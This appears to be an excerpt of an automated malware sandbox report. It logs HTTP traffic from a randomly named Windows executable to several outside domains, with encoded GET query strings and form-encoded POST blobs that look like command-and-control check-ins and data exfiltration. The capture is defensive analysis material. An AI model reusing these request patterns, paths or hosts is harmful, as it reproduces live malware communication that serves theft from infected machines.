                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeOYB29qGMJlfbn9pO/bkGeK6Rx38+43oOkL83uyTpqJYTGZmePsB3zHxmoiyHH8IFMKMj/djyNYKZfqqGP93uvrtESrHTBosDhYonNjakRdpiwOx9cXq/nx2frTl3GzSs/rb1tISX6ym8KY5rL9SxFCRk5DEaLQ9hVRw0l7CHfRmdBI0Brqz9+GwASQkwsnTBLRayXOdRPeGq5BPAkPgjSMaxvl0M8Pw5VuuZBGHoE7hCWlGCF5Mq2EmC+CMocLtOnHS+L78UmKjSp0PiFLDFhbXrEY4eWruLXjWSt+OTHVZbnWMJop0FdS8J5XwK28zOFcTHGv2Nj02EuDT8bbiqB8BNb6Ht+YN3OTZPG2+L9UFfHY6iC5qA1PEJ45e9ALeyG+N4EZOujzaHK0gJx+m4d/aYqnHed5Rlg4vhrLyl5JOeTTH2VO+tYRyUbFRSO0LkbxFCGY6hj+TfnBRd3z0rPca5+qJASmnWt7iWXtmVntmoIx/CaCSfk+loUMs2+tVACh6wpvH7KMhIhC8ynlLbdxb3IHuw7poGn7u4QOhakPbPEPuJsxwp+QNdytMZW0LKUHRYYwnQ1i3XcL12/iKP8+HjBttWn30xUh1bqDc68cLlqwadJBWYJEF2qE8LHG+7VUVbgmnOx55zKdOkB0vY50Q7ABCpR6RVvjRXFeJufG3bPTpDLqSCnB/W39cmTPt5dfULlkZ6E6wW2skULXcpx64lndCu7T0dqfT0ivjnSOvTHLUWe+/ZiW7Z7Zn/M5QiTvcZhVWfDHbChaNtfhWxexwYBnE55j2Vx6IW4g8b02fbIS/bGmCeNhxO4GilG6ZdY+eMew939MwLM4A38rVoQSWF20js+s7n+uCUysLhxXU5IShEKhqltlZIntsEtpfJnGo82mVWDDWwB7lCCr3xdp//MphOcVBO+W1Z/eRA7iqEaoVnZdD5fRT5PiJkUS9vu7kbo/rnWoswEAIdWt+Cddgws355VFOs1g [TRUNCATED]
                                                            Aug 28, 2024 14:03:30.124651909 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:29 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:30.124731064 CEST | 1236 | IN | Data Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:30.124738932 CEST | 1236 | IN | Data Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:30.125181913 CEST | 1236 | IN | Data Raw: ef 16 93 75 82 e0 d3 0a 5c c9 46 20 e7 07 53 84 ca 72 37 f7 7d 99 61 2a 02 c4 56 30 d8 9d e4 aa ef ff 95 1c 62 a3 a7 61 67 b0 b9 e6 60 79 33 e5 c2 36 54 ef 19 14 7a 29 c2 25 6e a0 d0 94 43 a4 0d 73 42 ab 30 57 16 dc 6b 91 66 da 38 a6 dc 0e c9 7d
                                                            Data Ascii: u\F Sr7}a*V0bag`y36Tz)%nCsB0Wkf8}SuaA&F5=F.c:u'4UTEw7k{+M31"{:s+n>$TXOeW6La%/^%68D0HJ
                                                            Aug 28, 2024 14:03:30.125189066 CEST | 1236 | IN | Data Raw: 36 e1 27 41 70 11 8d d8 a0 fa 99 52 13 8f c2 a0 d9 e9 f6 9b 9d cb f3 7d 59 9c 99 5b 30 b4 13 78 b8 f3 11 eb 3c 9a b8 02 0e 2e 9a 9d f3 c7 f2 bb 05 f0 19 bb bc 78 34 71 09 7c 85 d8 bd b3 cd f4 d2 22 b4 d8 2a 1d eb 28 b7 61 37 bb 2b 33 4a f5 ec 4c
                                                            Data Ascii: 6'ApR}Y[0x<.x4q|"*(a7+3JLE0,x{6f[}.K3=?#u2wBshwV1Au0$i5rc@r`7hQt+>JsT*)c(ZFZ>Ca36v9|;~;~G:!e
                                                            Aug 28, 2024 14:03:30.125195026 CEST | 1236 | IN | Data Raw: 08 4e 0d 70 cc 8b c6 5d e8 42 75 9e cc d1 39 3a b7 8b 02 6d 98 8a 4b 0e e7 57 fb c6 da aa 61 e9 08 8c 2f 89 46 fb 4b 44 9c 38 d4 00 fd 5e a8 82 e9 17 23 1e 8d ce 0e b1 7f 90 1e 04 3c b8 dc f6 c8 a6 28 4b b1 3d fb 4b e0 9d 71 74 08 7b 33 3b 38 bf
                                                            Data Ascii: Np]Bu9:mKWa/FKD8^#<(K=Kqt{3;8Yn2SFg3B+o7GZ9Ns8;$0W+IEH-yg>:;mq3KZYU;3q#V?ovniSw
                                                            Aug 28, 2024 14:03:30.125873089 CEST | 1236 | IN | Data Raw: 27 25 84 75 33 09 94 c6 52 8f 98 44 04 ad 1c 28 47 ad f8 00 08 d4 45 88 41 65 e2 54 70 58 64 75 ba 97 3e 8d dc 87 d3 04 0c d4 47 9a cf 1a d8 20 65 26 16 2a 24 01 3e b5 10 c2 0a 07 74 24 75 74 6b f1 35 63 9c fb 6d 3b 8d 8c 27 cc d4 1f b4 f1 1c 71
                                                            Data Ascii: '%u3RD(GEAeTpXdu>G e&*$>t$utk5cm;'quNcithQf(ZAB"i1)b5\$1bD>'/iS^p[VW2\3T\[Rfhf:zEwmnLhn V7MU{K0.5@qa
                                                            Aug 28, 2024 14:03:30.125880003 CEST | 1236 | IN | Data Raw: 6e 05 46 c6 24 d0 0c 1d 79 24 ce 2a bf 02 6b 22 70 6f d4 00 3f 12 6b 95 5f 81 25 f3 54 28 9d 2f 41 b5 61 2a 3e 76 d6 ca da c7 7b 30 b4 b9 79 5e 8b a2 b4 aa 83 88 13 87 eb 03 50 e5 42 8f 44 df 2a db ab f5 93 91 b7 cb f6 39 62 e9 be 63 25 7f 58 b4
                                                            Data Ascii: nF$y$*k"po?k_%T(/Aa*>v{0y^PBD*9bc%XSaf@"}'`nJ3#q.8{*ZEcg,;2}?-#t4*gJ\v]=B+fLc.lBcfd4>IP14tZTt+
                                                            Aug 28, 2024 14:03:30.125885963 CEST | 1236 | IN | Data Raw: e6 b3 07 2c 22 c9 d2 ac 1e b4 2e 2f ce 70 e4 26 59 9e c8 17 a4 5e ef 4c a6 84 62 a8 8b 81 06 f9 1c 4f 67 fd 6e a3 49 3a 65 64 81 e3 66 12 81 94 36 c8 b9 0c 4d 41 c4 89 0b c9 79 10 1c 33 02 61 8b c7 50 69 57 df 5d 64 a3 d1 98 3b b8 73 94 43 a4 0d
                                                            Data Ascii: ,"./p&Y^LbOgnI:edf6MAy3aPiW]d;sCsB+O9b^,<(7R{FLFc#$0K.ncspxI1HMyLgzbm.M,D<e&4*I:3-3
                                                            Aug 28, 2024 14:03:30.126523972 CEST | 1236 | IN | Data Raw: 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63 f9 17 77 a9 c4 27 e1 24 be fd fc f6
                                                            Data Ascii: ^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+qfi]
                                                            Aug 28, 2024 14:03:30.130285025 CEST | 1236 | IN | Data Raw: d7 94 92 3f 6b 1d 4b 20 bf b0 98 fc c0 14 8b c1 90 ba d2 36 32 22 73 0d 42 e9 cd 1f 4e ae 97 f7 9b 6b 31 36 2c 05 82 e2 0c 6b 5e 18 8b ca 4c a7 d3 56 5c a0 38 16 a7 25 46 a1 90 b2 ad c4 a5 f2 8f 82 0f ff fc cb 0f f4 af fd 9f be fe b7 9f bf fe be
                                                            Data Ascii: ?kK 62"sBNk16,k^LV\8%FPXjd*KS1aHHfa"8Un$ro|REt$utkK5:H&f8C2)6::6V8Y:bQQqfXP1:we&pLZHNga7


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.4 | 49749 | 162.241.2.92 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:31.990175009 CEST | 516 | OUT | GET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:03:32.616626024 CEST | 555 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:32 GMT
                                                            Server: nginx/1.23.4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://vendasnaweb1.com/jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            X-Server-Cache: true
                                                            X-Proxy-Cache: MISS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.4 | 49750 | 5.78.41.174 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:42.643485069 CEST | 779 | OUT | POST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 68 4f 6b 4e 66 45 31 58 39 65 41 57 30 6d 70 31 70 4f 75 65 63 61 76 52 65 51 59 37 46 39 73 6d 51 4c 30 59 45 32 48 6c 38 45 6b 37 76 7a 5a 64 64 51 38 64 73 54 45 39 54 65 78 43 4d 66 6f 79 5a 61 72 33 42 6e 4a 65 62 53 65 6d 77 34 57 66 42 78 57 37 49 78 54 32 4d 67 67 79 71 2b 64 6b 59 38 59 32 32 67 70 2f 49 6e 53 5a 35 6d 57 65 58 45 78 53 61 59 30 49 68 4c 32 44 57 37 2f 30 56 50 44 6c 42 35 74 62 6c 6b 4b 71 34 61 7a 6c 4c 5a 39 61 48 6a 34 70 54 6c 6a 4d 49 36 77 79 51 58 30 33 77 76 42 52 77 79 53 53 41 2f 42 2b 4a 41 53 4a 51 3d 3d
                                                            Data Ascii: 4NZpb=9nNBkBsNoW75xhOkNfE1X9eAW0mp1pOuecavReQY7F9smQL0YE2Hl8Ek7vzZddQ8dsTE9TexCMfoyZar3BnJebSemw4WfBxW7IxT2Mggyq+dkY8Y22gp/InSZ5mWeXExSaY0IhL2DW7/0VPDlB5tblkKq4azlLZ9aHj4pTljMI6wyQX03wvBRwySSA/B+JASJQ==
                                                            Aug 28, 2024 14:03:43.242506981 CEST | 516 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.4 | 49751 | 5.78.41.174 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:45.172820091 CEST | 799 | OUT | POST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 42 2b 6b 49 38 38 31 41 4e 65 44 54 30 6d 70 67 35 4f 71 65 63 47 76 52 66 55 49 75 6a 46 73 6f 51 62 30 5a 47 4f 48 69 38 45 6b 6a 66 7a 59 51 39 51 31 64 73 66 69 39 52 4b 78 43 4d 4c 6f 79 59 71 72 33 54 50 4b 63 4c 53 59 74 51 34 75 62 42 78 57 37 49 78 54 32 4d 6c 33 79 71 6d 64 6b 72 55 59 30 58 67 71 2b 49 6e 52 59 35 6d 57 49 6e 45 31 53 61 59 61 49 6c 4b 72 44 55 44 2f 30 51 72 44 68 44 51 37 53 6c 6b 45 33 49 61 6b 74 65 41 76 56 53 58 7a 67 43 52 41 54 70 57 32 33 57 47 75 6d 42 4f 57 44 77 57 68 50 48 32 31 7a 4b 39 62 53 51 49 52 2b 73 35 67 6b 4b 59 44 4a 34 57 77 6e 49 43 37 6f 37 30 3d
                                                            Data Ascii: 4NZpb=9nNBkBsNoW75xB+kI881ANeDT0mpg5OqecGvRfUIujFsoQb0ZGOHi8EkjfzYQ9Q1dsfi9RKxCMLoyYqr3TPKcLSYtQ4ubBxW7IxT2Ml3yqmdkrUY0Xgq+InRY5mWInE1SaYaIlKrDUD/0QrDhDQ7SlkE3IakteAvVSXzgCRATpW23WGumBOWDwWhPH21zK9bSQIR+s5gkKYDJ4WwnIC7o70=
                                                            Aug 28, 2024 14:03:45.776526928 CEST | 516 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.4 | 49752 | 5.78.41.174 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:47.705670118 CEST | 10881 | OUT | POST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 42 2b 6b 49 38 38 31 41 4e 65 44 54 30 6d 70 67 35 4f 71 65 63 47 76 52 66 55 49 75 6a 4e 73 6f 6a 6a 30 59 68 69 48 6a 38 45 6b 71 2f 7a 46 51 39 52 33 64 6f 7a 6d 39 52 57 4c 43 49 37 6f 30 36 69 72 6e 79 50 4b 57 4c 53 59 69 77 34 56 66 42 77 4f 37 49 42 4d 32 4d 31 33 79 71 6d 64 6b 75 51 59 69 57 67 71 38 49 6e 53 5a 35 6d 4b 65 58 45 64 53 61 51 73 49 6c 66 63 41 6c 6a 2f 31 77 37 44 6a 57 6b 37 50 56 6b 47 30 49 62 68 74 65 46 78 56 55 79 4b 67 43 6c 36 54 71 4b 32 33 77 72 72 38 46 37 4a 64 7a 43 59 66 47 47 2f 32 5a 74 45 61 41 45 4c 7a 4d 5a 68 36 2b 6f 61 4b 62 76 33 79 37 32 6f 37 62 44 52 32 71 71 56 7a 77 36 50 2b 68 61 2f 58 66 45 48 4f 55 6c 47 6d 50 34 4b 76 5a 7a 4f 51 76 45 68 31 68 79 5a 36 48 33 51 64 37 68 52 4b 52 31 4a 35 34 39 53 71 31 72 75 46 45 6b 59 51 72 68 6f 61 65 6a 57 47 6f 70 70 39 30 6f 62 6c 74 6f 73 62 62 33 7a 37 51 52 45 66 53 44 43 64 6d 50 75 47 2f 77 59 36 72 43 78 35 6c 2b 4d 46 62 70 5a 4f 54 31 34 [TRUNCATED]
                                                            Data Ascii: 4NZpb= [TRUNCATED]
                                                            Aug 28, 2024 14:03:48.309449911 CEST | 516 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.4 | 49753 | 5.78.41.174 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:50.239435911 CEST | 514 | OUT | GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:03:50.835014105 CEST | 662 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4=
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.4 | 49754 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:56.042025089 CEST | 794 | OUT | POST /4d31/ HTTP/1.1
                                                            Host: www.gtprivatewealth.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.gtprivatewealth.com
